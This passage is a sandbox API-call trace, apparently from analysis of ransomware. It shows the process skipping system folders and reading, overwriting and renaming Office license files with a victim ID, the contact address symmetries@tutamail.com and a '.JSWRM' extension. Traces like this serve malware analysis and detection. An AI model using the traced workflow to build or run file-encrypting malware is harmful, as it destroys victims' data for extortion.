Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0108.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0108.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0108.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0108.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0108.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0108.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0108.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0108.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.357] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11650) returned 1 [0108.357] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0108.357] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0108.362] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.362] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0108.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.363] CloseHandle (hObject=0x45c) returned 1 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0108.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0108.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0108.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0108.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0108.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.363] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0108.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0108.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0108.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.364] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9dbd976, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9dbd976, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9e5633f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTest-pl.xrm-ms", cAlternateFileName="PR77B2~1.XRM")) returned 1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.364] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.365] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.365] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.365] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0108.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.366] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0108.366] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0108.366] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0108.368] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.368] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0108.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.368] CloseHandle (hObject=0x45c) returned 1 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0108.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0108.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0108.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0108.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.370] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ba7880, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ba7880, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9c66463, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5171, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTest-ppd.xrm-ms", cAlternateFileName="PR5FB3~1.XRM")) returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.370] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0108.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.371] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20849) returned 1 [0108.371] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0108.371] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0108.374] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.374] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0108.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.374] CloseHandle (hObject=0x45c) returned 1 [0108.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0108.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0108.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0108.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0108.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0108.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.375] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.376] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9b81624, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9b81624, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9c40201, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="PRF590~1.XRM")) returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.376] lstrcmpiW (lpString1="ProjectStdO365R_SubTest-ul-oob.xrm-ms", 